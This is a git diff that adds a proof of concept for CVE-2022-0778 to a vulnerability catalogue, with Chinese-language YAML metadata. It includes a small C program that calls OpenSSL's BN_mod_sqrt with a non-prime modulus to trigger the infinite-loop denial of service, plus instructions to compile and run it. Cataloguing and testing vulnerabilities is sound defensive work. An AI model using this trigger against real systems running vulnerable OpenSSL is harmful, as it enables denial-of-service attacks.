diff --git a/cve/openssl/2022/CVE-2022-0778/README.md b/cve/openssl/2022/CVE-2022-0778/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..58c70fbb6bed739fbb86ac7146661d13e525af74
--- /dev/null
+++ b/cve/openssl/2022/CVE-2022-0778/README.md
@@ -0,0 +1,6 @@
+
+The prerequisite is having installed gcc and a vulnerable version of OpenSSL.
+
+POC of BN_mod_sqrt(): compile with gcc -o bad_BN bad_BN.c -lcrypto, run ./bad_BN
+
+REF: https://github.com/drago-96/CVE-2022-0778
\ No newline at end of file
diff --git a/cve/openssl/2022/CVE-2022-0778/bad_BN.c b/cve/openssl/2022/CVE-2022-0778/bad_BN.c
new file mode 100644
index 0000000000000000000000000000000000000000..34247ac8cd5324e2a1c58716edef597ea22d521e
--- /dev/null
+++ b/cve/openssl/2022/CVE-2022-0778/bad_BN.c
@@ -0,0 +1,22 @@
+#include <openssl/bn.h>
+
+
+int main() {
+    BN_CTX *ctx;
+    ctx = BN_CTX_new();
+    BIGNUM *res, *a, *p;
+    res = BN_CTX_get(ctx);
+    a = BN_CTX_get(ctx);
+    p = BN_CTX_get(ctx);
+
+    BN_dec2bn(&p, "697");
+    BN_dec2bn(&a, "696");
+
+    printf("p = %s\n", BN_bn2dec(p));
+    printf("a = %s\n", BN_bn2dec(a));
+
+    BIGNUM* check = BN_mod_sqrt(res, a, p, ctx);
+    printf("%s\n", BN_bn2dec(res));
+
+    return 0;
+}
\ No newline at end of file
diff --git a/cve/openssl/2022/yaml/CVE-2022-0778.yaml b/cve/openssl/2022/yaml/CVE-2022-0778.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..b571f37cd324800e25bed4ca326626b6313d28bc
--- /dev/null
+++ b/cve/openssl/2022/yaml/CVE-2022-0778.yaml
@@ -0,0 +1,17 @@
+id: CVE-2022-0778
+source: https://github.com/drago-96/CVE-2022-0778
+info:
+  name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层（SSLv2/v3）和安全传输层（TLSv1）协议的通用加密库。该产品支持多种加密算法，包括对称密码、哈希算法、安全散列算法等。
+  severity: High
+  description: 漏洞出自BN_mod_sqrt()接口函数，它用于计算模平方根，且期望参数p应该是个质数，但是函数内并没有进行检查，这导致内部可能出现无限循环。
+  scope-of-influence: Openssl 1.0.2, 1.1.1 和 3.0 版本
+  reference:
+    - https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2022-0778
+    cwe-id: CWE-835
+    cnvd-id: None
+    kve-id: None
+  tags: 不可达退出条件的循环（无限循环）
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index f822acc2b69f179a6e97f17564d06e258e4fe60d..f5862bafe457419f5bac3cee918a19b6a983d397 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -56,6 +56,7 @@ cve:
     - CVE-2022-2274
     - CVE-2022-3602
     - CVE-2023-25136
+    - CVE-2022-0778
   libxml2:
     - CVE-2020-24977
     - CVE-2021-3517